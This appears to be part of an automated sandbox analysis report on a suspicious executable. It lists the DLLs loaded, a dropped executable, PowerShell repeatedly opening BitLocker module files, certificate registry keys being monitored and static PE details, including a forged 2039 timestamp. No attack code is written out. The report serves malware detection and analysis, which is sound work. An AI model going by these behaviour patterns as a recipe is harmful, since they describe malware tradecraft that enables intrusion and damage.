Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: apphelp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: sspicli.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: wininet.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: rstrtmgr.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: ncrypt.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: ntasn1.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: dbghelp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: iertutil.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: windows.storage.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: wldp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: profapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: kernel.appcore.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: winhttp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: mswsock.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: iphlpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: winnsi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: urlmon.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: srvcli.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: netutils.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: dnsapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: rasadhlp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: fwpuclnt.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: schannel.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: mskeyprotect.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: msasn1.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: dpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: cryptsp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: rsaenh.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: cryptbase.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: gpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeSection loaded: ncryptsslp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: YYjRtxS70h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: YYjRtxS70h.exeStatic file information: File size 13793970 > 1048576
Source: YYjRtxS70h.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: YYjRtxS70h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb source: YYjRtxS70h.exe
Source: YYjRtxS70h.exeStatic PE information: 0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.drStatic PE information: section name: .00cfg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04BE633D push eax; ret 10_2_04BE6351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04BE2CFF push 04B807BAh; retf 10_2_04BE2CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04BE2C5C push 04B807BAh; retf 10_2_04BE2CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04B63A9B push ebx; retf 13_2_04B63ADA
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.drStatic PE information: section name: .text entropy: 6.864188260151341
Source: C:\Users\user\Desktop\YYjRtxS70h.exeFile created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
